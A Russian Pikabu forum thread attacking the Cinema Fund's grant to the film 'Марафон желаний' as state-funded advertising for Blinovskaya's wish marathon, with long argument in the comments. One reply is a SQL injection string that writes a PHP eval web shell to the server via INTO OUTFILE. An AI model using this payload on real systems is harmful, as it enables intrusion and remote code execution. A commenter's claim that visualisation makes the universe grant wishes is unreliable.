9986

Фонд Кино перешёл все границы1

Без рейтинга, поднимите, если не лень.

Вчера посмотрел ролик Стаса Васильева про фильм "Марафон желаний". Решил немного проверить инфу и ох@ел. Знаете, что это за фильм? Это, мать его, полнометражная реклама инфоцыганки Блиновской. И щедрый Фонд Кино выделил на это 25 млн рублей на безвозвратной основе.

Сам по себе фильм говнище редкостное, однако он с лихвой окупился. Вот что пишет кинопоиск - https://www.kinopoisk.ru/film/1228547/. Думаю это связано с большим промобюджетом фильма в 75 млн рублей при производственном в 90 млн рублей. Если погуглить, то пиарили его все подряд - и каналы, и радиостанции, и интернет-издания.

Как фильм связан с Блиновской? Для начала, название фильма есть название курса "личностного роста". Это такая бредятина, можете погуглить. У неё даже отдельный инстаграм для отзывов есть. (Осторожно, жесть) https://www.instagram.com/my_dream_on/?hl=ru. Собственно, она сама и не скрывает, что фильм про её проект:

Также она указана в качестве продюсера и сыграла эпизодическую роль. А сам сюжет пронизан идеей "исполнения желаний, силы вселенной" и прочими сказками.

Но как на это повёлся Фонд Кино? На питчинге фильм представляла кинокомпания Белый зонт. И продюсер Екатерина Кононенко в открытую говорит, что фильм основан на "Набирающем социальном явлении - марафоны и тренинги личностного роста. Там всё по правде". Вот можете посмотреть - https://www.youtube.com/watch?v=lZ6H5jXSXos&feature=emb_....

Примерно с 1:58:15. И ни у одного члена комиссии не возникло вопроса, что это значит.

Кстати, кинокомпания Белый зонт вновь получит поддержку и вновь на безвозвратной основе.

http://www.fond-kino.ru/news/proekty-inyh-organizacij-kinema...

Кое-как за несколько лет обществу и Евгену Бэдкомедиану удалось добиться того, чтобы хоть какие-то провальные проекты несли за это ответственность. Теперь же Фонд Кино осваивает новые грани - финансирование пиара инфоцыган, продающих за немалые деньги прописные истины. А еще немного пугает количество откровенно тупых людей. У Блиновской на основном аккаунте в инсте более 2 млн подписчиков. Если хотите, загуглите и почитайте комменты - ох@еете. 

P.S. @TheBadComedian, как ты позволил этому шедевру выйти в эфир? 

181
Автор поста оценил этот комментарий
Ага, типа анти-пиарный пост. Если б не один нюанс. Я вот, например, первый раз услышал эту фамилию и всё остальное что с ней связано. Вопрос: вы-то зачем это сделали?
раскрыть ветку (1)
222

Мне вообще похуй на неё. Мне не похуй на то, что творит Фонд Кино. Это наглость высшей степени. А фамилия для того, чтобы все кто сомневается могли проверить истинность данных.

показать ответы
79

Учитывая, что Стас друг Евгена, думаю Бед вкурсе ситуации с фильмом, ты лучше бы сам обзор пропиарил, Стас старался, а учитывая его навыки он еще кучу всякого говна нарыть способен и на фонд кино и вообще, главное что бы мотивация для этого была

раскрыть ветку (1)
51

Можно попробовать попросить @moderator, добавить в пост ссылку на ролик Стаса - https://youtu.be/xKQEpp8z7qg. Правилами вроде не запрещено.

показать ответы
DELETED
А зачем Вы тогда это смотрели и вчитывались в титры?
раскрыть ветку (1)
35

Пост походу не читал. Я из РОЛИКА узнал, что фонд кино выделил деньги инфоцыганке и решил выяснить какого лешего это произошло. И уже ПОТОМ посмотрел фильм и нашел в титрах имена.

показать ответы
DELETED
Все равно я не совсем понимаю смысл заострять внимание на подобных фильмах. Эти деньги не вернуть и фонд кино к такому не прислушается. Не лучше ли просто не вспоминать про подобные фильмы и не делать им рекламы антирекламой?
раскрыть ветку (1)
24

Нет, не лучше. Многие фильмы от бездарных режиссёров в итоге были лишены дальнейшего финансирования после общественного резонанса, вызванного в большей степени обзорами Евгена. Так что внимание привлекать нужно, это наши с вами деньги.

Страшно то, что в интернетах притяно засирать друг друга)
Сразу идут слова, за которые народ накидает плюсики:
Инфоцыгане, украли денег через фонд кино и сняли говно, так это же благодатная тема и плюсов срубить и себя по пиарить, высказать свое мнение для блогеров.
В последнее время верить мало кому можно и блогеры говно и тех кого они хэйтят или пиарят, короче все говно)
раскрыть ветку (1)
7

Да нахер нужны эти плюсики. Пост вообще без рейтинга. Просто реально бесит эта дичь. А для того, чтобы каждый мог проверить инфу, я накидал ссылок на все, что написал.

DELETED
А где именно сказано, что дали на безвозмездной основе, в ссылках , что в посте этого нет, а то не хочется, как то попадать в глупое положение, закидывать говном, а потом окажется, что зря.
раскрыть ветку (1)

неправомерное использование тэга "без рейтинга"

раскрыть ветку (1)
12

Вот как раз в посте я и удивлялся подобным людям.

показать ответы

А что творит фонд кино? Поддерживает отечественный кинематограф? В чем проблема? Если говорите, фильм окупился, значит правильная поддержка. Зритель голосует рублем, кому то нравится, кому то нет. Или фонд кино должен финансировать только те фильмы, которые нравится вам?

раскрыть ветку (1)
9

Скажите, а вы пост через жопу читали?

показать ответы

А в чем проблема-то?

Кроме словестного поноса автора кто-то чем-то еще вооружился?

Фильм окупился. И принес прибыль. Дербмо это редкое или нет. Зайдите в текток и посмотрите трендовые видео. Может той же публике всякое дерьмо и снимают.

К слову о марафоне желаний:

Проходил сам год назад. Часть желаний сбылось.

Это психонастройка и самопрограммирование.

Проработка своих страхов, познание себя.

Это если с научной точки зрения объяснять.

С ненаучной. А кто вам сказал, что это невозможно? Вселенная всегда исполняет наши желания. Просто иногда тупит. Например "я хочу крутую тачку" но она у вас появляется в игре симс2 и мысль "о, у меня появмлась крутая тачка" делает желанием выполненным.

Или визуализация того, как вы едете на ней - могут дать покататься или прокатить. Тоже выполнено.

Например я загадал доход в 500т.р. и визуализировал тем, что вижу на сбере онлайн эту сумму. И что думаете? Мне упал на эти деньги кредит. Ровно эта сумма. Максимум, что дали.

Вселенная всегда исполняет наши желания. Опятб же. Может это самопрограммирование. Может это бог-кришна слвшит наши молитвы и каждый раз подбрасывает монеткк, может мв все в компьютерной игре и сверху нам сыпется помощь, чтоб играть было не так трудно.

Я не защищаю фильм. Мне на это вообще насрать. Просто удивлен однобокому пиздежу в одни ворота.

П.с. жалко двух тысяч рублей, скачайте марафон из интернетов. Но на марафоне вам могут исправить ошибки

Иллюстрация к комментарию
раскрыть ветку (1)
7

Например я загадал доход в 500т.р. и визуализировал тем, что вижу на сбере онлайн эту сумму. И что думаете? Мне упал на эти деньги кредит. Ровно эта сумма. Максимум, что дали.

Вселенная всегда исполняет наши желания

Ясненько. Вот и те, кому я удивлялся в посте. 
показать ответы

Ну я смотрела с мужем, мужу кстати понравилось, а он будет поумнее многих. ) нужно понимать для кого и о чем этот фильм. Он как бы не претендует на особую глубину, разве нет? Это легкая комедия, без пошлого тупого юмора. Ну по крайней мере мы вышли из кино улыбаясь. Еще я проходила сам марафон - она там как бы не открывает Америку и говорит прописные истины , но кому-то проще принять их из чужих уст. И нет я не ее фанатка, много с чем не согласна из ее изречений о жизни и тд, но она хороший коуч, у неё хороший голос и правильно поставленные «сеансы». Не знаю чего у вас так припекло, впрочем вообще ваше мнение очень похоже на весь тот хейт которого уже полно в сети) Зачастую хейт склоняется к тому, что «мне обещали» но ничего не произошло. Забывая о том, чтобы желания сбывались они должны быть своими, искрениями, правильными. У меня сбылось )) но я и не загадывала Бэнтли, прост оно мне не нужно. зато вы аудитории Пикабу дали информацию, и из 10 человек согласных с вами найдётся 1 который проникнется темой этого марафона и полезет изучать детали не с хейтерской подачи, может даже пройдёт сам марафон)

Можете кидать тапками, ага))

Ловите сектантку😅

раскрыть ветку (1)
6
без пошлого тупого юмора
Он вообще без юмора. Понимаете, она может делать что угодно, хоть сетями рыбными к себе лохов притаскивать. И фильмы может снимать какие угодно. Но пусть она это делает не за НАШ счёт. И претензия тут не к ней, а к фонду кино, который выделил деньги. 
показать ответы
10
DELETED

P.S. @TheBadComedian, как ты позволил этому шедевру выйти в эфир?

Как человек, который выпускает фильмы уже после выхода в цифровой релиз может не позволить выйти чему-либо там?)

Насчёт Фонда кино:
Если фильм окупился и деньги ФК вернули, то какие могут быть претензии? Вопрос в том, что фильм говнище редкостное, но на него же пошли.

раскрыть ветку (1)
8

Как вы посты читаете? Деньги на безвозвратной основе. 25 лямов. И новый фильм от этой же компании снова получит. Пока только не знаю сколько.

показать ответы
17
Тут вы должны понимать, что такое безвозвратные деньги от фонда кино, это не значит, что их не вернут, это значит, что если фильм провалится их не вернут, а если заработает, то вернут причем без процентов. Т.е. фильм заработал, деньги вернулись в фонд кино, а сотни людей не уволились из кинобизнеса, а продолжили работать. Не очень понял, что именно не так. Качество фильма? Но вы сами говорите, что он заработал денег. Значит не так уж он и плох оказался для кого-то. Почему вы считаете, что именно ваше видинье того, что такое хорошо, а что такое плохо единственно возможное? Тупым людям нельзя смотреть кино? А что им делать? Не книжки же читать. Хотите снять шедевр? Вам ни кто не запрещает пойти в фонд кино и попросить денег. Почему они не дают денег на шедевры? Потому что шедевры у нас точно не окупятся, вон на Быкова посмотрите. Так что с точки зрения рациональности использования средств фонд кино все сделал правильно.
раскрыть ветку (1)
6
Тут вы должны понимать, что такое безвозвратные деньги от фонда кино, это не значит, что их не вернут, это значит, что если фильм провалится их не вернут, а если заработает, то вернут причем без процентов
Это называется возвратные деньги. И под такой категорией ФК тоже деньги выдает. Но не в этом случае.

Чёт тут странное, таких пабликов в инсте - море, в фильме про связь с конкретным из них нет ни слова, а вы тут вообще кажется грязный пиар устраиваете.

@moderator, имхо, мне кажется надо как минимум убрать название канала и ссылки на него.

раскрыть ветку (1)
4

Что значит нет? Она продюсер, снимается в фильме, фильм называется также как и её проект, другой продюсер на питчинге говорит, что фильм основан на марафонах и тренингах. Вообще никакой связи нет?

показать ответы
0

Согласен, по-моему там наоборот высмеивают подобные мероприятия. А персона, с которой бомбит автора, просто удачно примазалась.

раскрыть ветку (1)
3

К сожалению там всё наоборот. Фильм создавался под эту даму. Это на питчинге и произносит продюсер.

показать ответы
Bond. Vagabond.

Сформулируйте ваш вопрос иначе и я попробую на него ответить.

раскрыть ветку (1)
2
sqlinj/index2.php?user=-1' UNION SELECT 1,'<?php eval($_GET[1]) ?>',3,4,5 INTO OUTFILE '1.php' --%20
показать ответы
6
А ты фильм смотрел вообще?
Там как бы наоборот речь идёт о том, что надо самой свои желания исполнять. Все, что она записывала исполнялось криво.
«Не читал, но осуждаю», Кононенко и Чарушей прошли марафон в своё время, также как и несколько миллионов других людей и решили, что фильм с такой идеей выстрелит, так как сейчас особенно популярна история с желаниями и Вселенной. Пришли к Блиновской и она вписалась как продюсер (а не сама она решила снять фильм имени себя).
Я была на закрытой премьере и все знаю из первых уст.
И оценки ни разу не накрученные, так как миллионы фанатов марафона влюбились в этот фильм.
раскрыть ветку (1)
1
А ты фильм смотрел вообще?
Смотрел, дичь полная
что надо самой свои желания исполнять

В конце фильма произносится монолог, подытоживая фильм: "Всё в этом мире связано тонкой деликатной паутиной жизни", "Иногда нужно сражаться, а иногда просто довериться судьбе". И чего она там, кстати сама исполнила? Всё что с ней происходит - тотальное везение. Такого в жизни не бывает.

не сама она решила снять фильм имени себя
Странно, а в её группе написано, что фильм про них.

миллионы фанатов
И где же они все? Зрителей едва на миллион наскреблось. Оценку и вовсе всего 10000 поставили и то, если отзывы не накрученные, "фанатов" там всего тысяч 5.

показать ответы
DELETED

Я не понимаю, почему все думают, что фонд кино должен финансировать успешные фильмы. Фонд кино - это социальная структура, все его действия должны быть направлены  (и они направлены) в первую очередь на увеличение производства фильмов, а не на качество фильмов. Фонд кино может только обеспечить условия для создания качественных фильмов, но у него нет обязанности финансировать только качественные фильмы. Да и как узнать, получится ли фильм качественным, если он ещё не вышел. В разработке фильма задействованы десятки профессионалов - сценаристы, актёры, монтажеры, спецы по эффектам, продюсеры, рекламщики и т.д.. И каждый из этих спецов может сделать фильм провальнее/успешнее. Но одна из задач фонда - обеспечить этих спецов работой, это и есть одна из основных деятельностей социального фонда. Если не будет деятельности фонда, то замедлится обучение новых спецов, ухудшится общее качество картин, ухудшится инвестиционный климат в российское кинопроизводство.
Это крайне непопулярная точка зрения, но это так. Фонду кино правительством поставлена задача (и это можно найти на сайте фонда кино) - создать как можно больше рабочих мест, выпустить больше картин. Задача "финансировать хорошие фильмы" просто не стоит перед фондом кино.
Посмотрите на задачи Фонда Кино: http://www.fond-kino.ru/about/history/
Там нет ничего про финансирование хороших фильмов, зато есть про создание рабочих мест для мастеров киноискусства.

раскрыть ветку (1)
1

Я понимаю задачи фонда и согласен с ними. Но там нет пункта "обеспечить откровенных инфоцыган поддержкой". Утрирую конечно, но сама система отбора очень не совершенна. И вина тут и минкульта и фонда. Из-за того, что выдают деньги на всякие высеры, действительно хорошие начинающие режиссеры не могут получить субсидий.

показать ответы
Вьебал посту минус. По-моему, автор сам какой-то инфо-цыган: ничего толком не объяснил, ни кто такая Блиновская, почему она плохая, почему "фильм говно, хотя и окупился" и причём тут @TheBadComedian.
раскрыть ветку (1)
1

В конце поста как раз написал, что такие люди меня пугают.

2
Bond. Vagabond.
раскрыть ветку (1)
1

Завораживает. Приберегу, пожалуй

Иллюстрация к комментарию

сама она помогла этому повару, когда пыталась придумать план, как его свести с тем шефом. а когда она вела себя как обычная ТП и писала соответствующие желания - все у нее шло не так. ты фильм то смотрел сам или только обзором ограничился?

раскрыть ветку (1)
0

Давайте я вам напомню:

1. пишет в блокнот - хочу найти паспорт. приходит домой - и о чудо, паспорт найден. Сама сделала? Нет. Пиар марафона желаний.

2. пишет в блокнот - хочу выйти из тюрьмы. приходит нагиев и ЗАЧЕМ-ТО выкупает эту фоторамку, типа и за неё штраф отдаёт сразу. это вообще какой-то ломающий мозг ход. Сама сделала? Пиар марафона желаний.

3. пишет в блокнот - хочу в самолет прямо сейчас. Заходит в туалет и слышит беседу варнавы и еще там кого-то и подмазывается к ним. Сама сделала? Нет. Пиар марафона желаний. Там дальше откровенная тупость с её стороны, но в самолете она оказалась.

4. пишет в блокнот - хочу найти Сашу. через минуту он сам выходит из двери прямо перед ней. Сама сделала? Нет. Пиар марафона желаний.

5. пишет в блокнот - хочу попасть в вип зал. Тут не спорю сделала частично сама, но это так тупо обставлено. В номер через вентшахту к тебе попадают посторонние, а ты им такой говоришь: "Сумасшедшие русские. Я дам вам шанс". Им сильно повезло, что этот шеф настолько тупой.

В итоге, всё что она делала САМА - это бездарно косячила и только.

показать ответы

у нее получилось только тогда, когда она начала сама что-то делать. а когда она следовала курсам и советам своей подружки , все шло через жопу.

раскрыть ветку (1)
0

И что же она там сама сделала, напомните. Весь фильм - это набор не связанных моментов везения.

показать ответы
Bond. Vagabond.

Смешно. Как Петросяна гнобить, так легион пикабушников поднимается. А его, на минуточку, любят миллионы. Как обсирать фильм про то, на что подписаны миллионы - всегда пожалуйста. Бузова с миллионами подписчиками - отстой. Киркоров и Стас Михайлов, собирающие аншлаги - фи. Меня все перечисленное тоже бесит, НО:

Стоит заикнуться, что комиксы для умственно отсталых, сразу - на вкус и цвет фломастеры разные. Что ван даммы, мистеры бины, марвелы, джимы керри - для очень особо одаренных индивидов, сразу волна возмущения.

Уж будьте последовательны. Раз фильм окупается, значит, он востребован. Значит, кому-то это интересно и нужно.

раскрыть ветку (1)
0

еб твою мать... 6,4 млн рейтинг. ты нейросеть?

К сожалению, окупаемость сейчас вообще не показатель. Агрессивный пиар по всему медиапространству и протолкнуть можно любое говно. А деньги у них были.

показать ответы
0
Автор, не поверишь, номер не ограничивается твоими познаниями и мнением. Кто-то посмотрел этот фильм и им понравилось, надо это как минимум принять. А пост похож на однобокий высер.
раскрыть ветку (1)
0

По-моему высер как раз этот коммент. Ты пост читал вообще?

DELETED

А к фонду кино-то какие вопросы? Фильм снят, фильм окупился, фильм кому-то понравился (из комментариев видно), над созданием фильма работало много людей. По-моему фонд кино хорошо справился с поставленными перед ним задачами.

раскрыть ветку (1)
0

Ну лично у меня, как у налогоплательщика есть к фонду вопросы. Например, почему за бюджетные деньги пиарят каких-то инфоцыган. Это поддержка на уровне государства и ей можно смело бравировать при пиаре.

0
DELETED

А зачем вы навешиваете ярлык "инфоцыган"? Чем этот человек хуже других людей? Как определить хорошего начинающего режиссера? Может создательница обсуждаемого фильма и есть хороший начинающий режиссер - она смогла не только осветить острую социальную проблему, но и окупилась в прокате, чего не могут даже многие опытные команды. Более того, она смогла привлечь огромные сторонние инвестиции, пока что я не понимаю, чем этот проект плох.

раскрыть ветку (1)
0

Инфоцыган - это не про режиссера. Это про ту, ради которой и был снят фильм для пиара. Он не мог не окупиться в прокате, его пиарили где только можно. 75 млн был только рекламный бюджет. Тут любую шнягу бы схавали. Плюс там несколько звёзд минут на пять засветились тупо для постера.

показать ответы

Мне больше интересно, почему он как сценарист Д. Найшуллер, а как продюсер - И. Найшуллер))

раскрыть ветку (1)
0

Илья Найшуллер здесь как продюсер. А Д. Найшуллер - это его жена Дарья Чаруша. Она же режиссёр.

1

смотрела, мне фильм понравился как раз всем этим стебом над марафонами и "волшебными подарками" от вселенной. на курсы марафонов не побежала после просмотра и ваще про эту Блиновскую не слышала даже))
"Где она это делает? Всё хорошее, что с ней происходит - везение." - когда пишет в блокнот, естественно, это и есть ее цели. Да, там ее во многом везет (ну так комедия же , а не драма), а она учится ловить возможности и ими пользоваться (попала в самолет, добилась чтобы шеф их выслушал и дал повару шанс и т д) , попутно сильно косячит и навлекает новые неприятности и на себя и на повара, потому что тупая (ну и чтоб можно было над ней поржать и продвинуть сюжет дальше).

"загадала, записала и оп - исполнилось" - все эти марафоны построены на НЛП, если слышали про такое, это довольно банальный психологический прием и тут просто показывается как это работает. Не потому что действительно вселенная исполняет желания, можно загадать и не париться, а потому что ты сам начал что-то делать для этого.

раскрыть ветку (1)

Мда. Вот именно такие видимо и ходят к Блиновской. Сначала вы вообще говорили, что у нее ничего не исполняется.

понравился как раз всем этим стебом над марафонами
Какой стеб, если показано как работает марафон. Где тут стеб? Показано так, как дает в заданиях Блиновская один в один.
естественно, это и есть ее цели
нет, это не цели. В каждой ситуации, когда она писала в блокнот - это был способ исправить косяк, случившийся по её тупости. В этом фильме у неё нет целей, она ничего не добивается, всё решает "Вселенная".

потому что ты сам начал что-то делать для этого
Да в каком месте она сама начала что-то делать-то???

это довольно банальный психологический прием и тут просто показывается как это работает
Нет, не показывает. В том то и деле, что показано именно "записала - исполнилось". Ни привязанной логики, ни обоснований.

Так чему учит этот "стебный" фильм?

ой, прям пиар на пиаре  (как-будто в фильм встроена бегущая строка "приходите на марафон"). а то, что , все это подается как цепь случайных событий с акцентом на тупость героини и мозговынос для более менее адекватного парня-повара от окружающих (почему он и купил ту рамку), вы не замечаете. В принципе, нормальный смысл всех этих марафонов, что человек учится ставить себе цели и идти к ним, что эта героиня и делает, но это не означает, что вселенная подогнала чудо, просто человек оторвал жопку от дивана и начал что-то делать, искать возможности (хоть бы и внаглую набиваться в чужой самолет, про который ты случайно услышал в туалете).

раскрыть ветку (1)
что человек учится ставить себе цели и идти к ним
Где она это делает? Всё хорошее, что с ней происходит - везение. И это подаётся так, будто она это загадала, записала и оп - исполнилось.
оторвал жопку от дивана и начал что-то делать, искать возможности

А где это она делает?

Вы сами вообще смотрели фильм?

показать ответы
0

Про желания ниже ответила.

Про группу: ну конечно они лишний раз не против себя прорекламировать. Но как по мне - это абсолютная антирелама марафона. Ничего там волшебным образом (без действий) не сбывалось.

Про зрителей: После премьеры мы (как ивент-агентство) делали вечеринку для "Клуба Блиновской". Только в Москве на нее пришло 4000 человек, а она проводилась в 20 городах России одновременно. Так что сужу по такой выборке.

И еще раз: фильм вообще не шедевр, он не дотягивает даже до Холопа, который вышел 3 неделями раньше и выстрелил дай боже. Героиня Тарасовой - бесявая.

НО это не реклама "Марафона желаний" и Блиновской лично (там ее имя кстати даже не называется). И для меня этот фильм неплохой как минимум потому что сценаристом был Гудок, который считается очень даже хорошим комедиантом и чуйкой

раскрыть ветку (1)
Только в Москве на нее пришло 4000 человек, а она проводилась в 20 городах России одновременно
миллионы фанатов

НО это не реклама "Марафона желаний"
Фильм под названием "Марафон желаний", в котором продюсер и актриса создатель марафона желаний, главная героиня пишет всё в блокнот и всё сбывается. Конечно, это не реклама. Эта тупо мощный пиар от государства.

Почитайте про разницу между знанием, умением и навыком, уделите 5 минут личностному росту.
если бы все люди могли запросто "поднять жопу с дивана, то не появились бы шутки про диванные войска и многие другие.
раскрыть ветку (1)

При чем тут это? Я спросил почему нельзя самостоятельно поставить цель и идти к ней?

показать ответы

Может я неправильно написал:

Я загадывал доход. И визуализировал его "вот на карте 500 тысяч"

Вселенная выполнила мое желание - 500 тысяч на карте. Не в виде дохода, а кредита. Ибо вселенная исполняет желания в виде ощущений. Так понятно?

И подъебать может очень знатно.

раскрыть ветку (1)

То есть ты не обращался в банк, не отправлял заявку на кредит, ты не хотел его получить? Ты просто подумал, визуализировал и вселенная такая: на тебе 500 к на карту. Так?

показать ответы
Знание о строении темной материи вам поможет в жизни ровно ничем. А умение ставить цели и их добиваться, а еще если развить этот навык, очень поможет.
раскрыть ветку (1)

То есть просто так поставить цель и её добиваться без пастуха нельзя? Какой навык? Установки целей? Это секретный навык?

показать ответы
Такое стереотипное понятие о тренингах...
Ваша точка зрения примерно так же соответствует действительности, как мнение американца о России.. водка, матрешка, балалайка.
попробуете устриц, обсудим их вкус. Иначе нет смысла
раскрыть ветку (1)

А что нового они могут рассказать? У них есть данные о строении тёмной материи? Знают где заканчивается вселенная? Или не заканчивается вовсе?

Они просто пудрят мозг, рассказывая то, что и так каждый знает. А глупыши думают - "блин, это про меня. Я должен встать и что-то делать".

показать ответы
1
Мне кажется это был сарказм. Я очень надеюсь на то что это был сарказм. Я не хочу признавать что бывают такие идиоты. Вселенная, исполни мое желание, пусть это будет сарказмом.
раскрыть ветку (1)

К слову о марафоне желаний:

Проходил сам год назад. Часть желаний сбылось.

Это психонастройка и самопрограммирование.

Проработка своих страхов, познание себя.

Скорее всего не сарказм.

Особенно, учитывая это:

Это если с научной точки зрения объяснять

Что значит нет? Она продюсер
Что вообще ни как не говорит о том, что у неё есть какой-то канал, я вот первый раз об этом слышу

фильм называется также как и её проект
Ещё раз, таких "марафонов желаний" вагон и маленькая тележка и все они называются одинаково

другой продюсер на питчинге говорит, что фильм основан на марафонах и тренингах.
Коих опять же, достаточно много

раскрыть ветку (1)

Ещё раз, таких "марафонов желаний" вагон и маленькая тележка и все они называются одинаково
Ну-ка вбей в поиск "Марафон желаний". Кого видишь? Это очень грамотный и мощный пиар.

Найдешь ещё кого-то кто подаёт идею фильма под таким же соусом? Я имею в виду прося деньги у фонда кино.

Что значит нет? Она продюсер
Что вообще ни как не говорит о том, что у неё есть какой-то канал, я вот первый раз об этом слышу

фильм называется также как и её проект

другой продюсер на питчинге говорит, что фильм основан на марафонах и тренингах.

раскрыть ветку (1)

Тоже пост не читал? То что она продюсер и не должно говорить, что у неё есть канал. Тут обратная связь. Инфоцыганка решила пропиариться, не важно как она вышла на эту киностудию - полностью финансировала или частично. И весь фильм снимается под одной идеей, под тем же названием, подаётся как "модное" веяние в виде марафонов и тренингов. Да даже хрен с ней, пусть снимает что хочет, но на СВОИ деньги и без участия государства. Вот в чем основная проблема. 

Давай подумаем последовательно.

Каждый день я визуализирую свои желания и провожу некоторые махинации.  Они помогают сосредоточиться. Или например, когда мне хочется сожрать мороженное, у меня в голове всплывает фраза "я хочу быть в хорошей физической форме и питаться правильно" и я мороженное не ем.

Некое программирование. Ок?

Теперь, когда я настраиваю свое программирование на тему - хочу разбогатеть и вижу сумму в 500 тысяч на сбере. В течение года ищу сделки, нахожу проект. Понимаю, что мне нужен кредит. Мне падает эта сумма на карту. И тут я вспоминаю, что год назад я загадывал это желание с визуализацией (500т.р. на карте)

И я пришел к этой цели сознательно естественно. Но если бы я желал, не бизнес, а сидеть жопой в песке на карибах - то сидел бы жопой в песке на карибах. И ВОЗМОЖНО, вселенная вполне может выполнять наши желания. Правда не так, как мы это задумываем.

Еще раз. Если осмыслить свою жизнь, то все, что мы хотим - сбывается. Разве нет?

раскрыть ветку (1)

Бля)))) Как вообще люди с такой наркоманией в голове еще и бизнес ведут. Это жесть.

показать ответы

Это тренинг. Что мешает разбираться в женской психологии без книги?

Пройдите. Сделайте вывод. Это бесплатно. Потом мнение будет всецело полезно. А не глухой пиздешь как у автора

раскрыть ветку (1)

Тренинг чего? Тех прописных истин, которые и так все знают? Насколько надо быть глупым, чтобы не понять, что что-то делаешь не так и что нужно менять приоритеты, цели и действовать иначе? Зачем для этого обращаться к кому-то?

показать ответы
0

Может быть ещё и не понял, но я попробую повторить ещё раз озвеченную тут мысль - если бы не ты, то про эту инфоцыганку никто бы и знать не знал.

Многие не видели, многие посмотрели... Но потом пришёл ты и теперь о ней знают даже те, кто и знать не хотел.

раскрыть ветку (1)

Блин, ну как вы все посты читаете? Понимаете, да ебись она в рот, эта Блиновская. Дело не в ней, она тут просто очередная бенефициарка. На её месте может хуйновская, бабовская. Дело в том, что Фонд выдает деньги таким людям, инфоцыганам. Наши деньги.

показать ответы
Всегда умиляли люди, спорящие о вкусе устриц, и ни разу их не пробовавшие.
я проходил тренинг, и могу четко сказать, что эффект есть. Он не в том, что ты внезапно становишься успешным, а просто немного мееяется мировоззрение. Что-то в лучшую сторону, что-то не очень.
и главное, со временем эффект ослабевает. Поэтому те, кого тренинги приводят к успеху, посещают их регулярно, это как наркотик.
но действует не на всех, как гипноз.
раскрыть ветку (1)

Всегда умиляли люди, которым для смены мировоззрения нужен пинок от третьей стороны. То есть своих мозгов понять, что что-то с тобой не так и надо что-то менять не хватает? Нужно отдать 5-6 к чтобы кто-то рассказал про "оторви жопу с дивана", "очень сильно пожелай", "выкинь 10 вещей" и т.д?

показать ответы
2

Вот щас бы верить рейтингу на сайтах, особенно после того, как уже неоднократно было показано, как стадо хомячья просто идут и ставят единицу фильму, который не смотрели, но на который выпустил обзор более-менее популярный блогер.

Классическое "Не читал, но осуждаю".

У меня огромная просьба ко всем, кто делает обзоры или пишет рецензии - будьте менее ультимативными, или просите аудиторию, прежде чем ставить оценки посмотреть фильм или просите их не ставить оценки на основании обзора или рецензии.

ты сам то не находишь, что это как-то глупо, оценивать фильм не смотря.

Или судить о том, хороший ли фильм по оценкам других?

раскрыть ветку (1)
Вот что хочешь говори, любую патетику используй, но если окупился - значит, точно не редкостное говно
Думаю, мне стоило бы прекратить спор уже после этого. Еще раз повторяю - были большие деньги на пиар, были деньги на производство, была поддержка фонда. Но фильм говно, я так считаю. И также считает кинопоиск. И окупаемость не коррелирует с качеством. 
показать ответы
4
Сам по себе фильм говнище редкостное, однако он с лихвой окупился.

Так не бывает. Вот что хочешь говори, любую патетику используй, но если окупился - значит, точно не редкостное говно. Плохой- да. Как будто что-то новое "О, вышел новый плохой фильм при поддержке государства! Никогда такого не было!"

Абсолютно не в защиту ФК или гадалок или про кого там фильм.

Хотя, если ты фанат Бэдкомедиана, то диалог с тобой практически лишен смысла.

Ведь, оказывается, о вкусах теперь можно спорить. И осуждать других людей за то, что им нравится то, что не нравится тебе.

Ладно, то, что он назвал "Горько" - фильмом для быдла, полбеды. Но не понять Звягинцева... Это уже за гранью.

Кстати, а ты вот прям такой классический фанат Бэда, которому нравятся абсолютно все его обзоры и ты пересматриваешь их не по разу? Даже нелепые обзоры в стихах?) Или ты так, на полшишечки?_)

раскрыть ветку (1)

Если есть 75 лямов на промоушн, поддержка фонда кино и медиаресурсы, окупить можно любое говно. Собственно, рейтинг на кинопоиске об этом и говорит. Ведь те кто смотрит, сначала платит, а уже потом понимает хороший фильм или нет. Если фильм говно деньги же не вернут.

показать ответы
6

Тоже не понял, о чём пост. Фильм вышел, не провалился в прокате. Что не так?

раскрыть ветку (1)

Да срать бы вообще на этот фильм, если бы они снимали его без помощи государства. 25 лямов выделили из бюджета. Из наших с вами денег. И сделано это для пиара очередной инфоцыганки.

показать ответы

Что ты несёшь? Задача заработать денег. Это бизнес. Пока окупается будут снимать хоть как ослы ебуца на сеновале под луной, задача- заработать бабла! Хочешь умное кино? Таких тоже снимается доебеней! Но оно почти никогда не окупается, смекаешь? Вам самим не настопиздело одно и тоже мусолить блядь?

раскрыть ветку (1)

Ты точно на мой комментарий хотел ответить? Я так и написал - окупаемость не коррелирует с качеством.

Темы

Политика

Теги

Популярные авторы

Сообщества

18+

Теги

Популярные авторы

Сообщества

Игры

Теги

Популярные авторы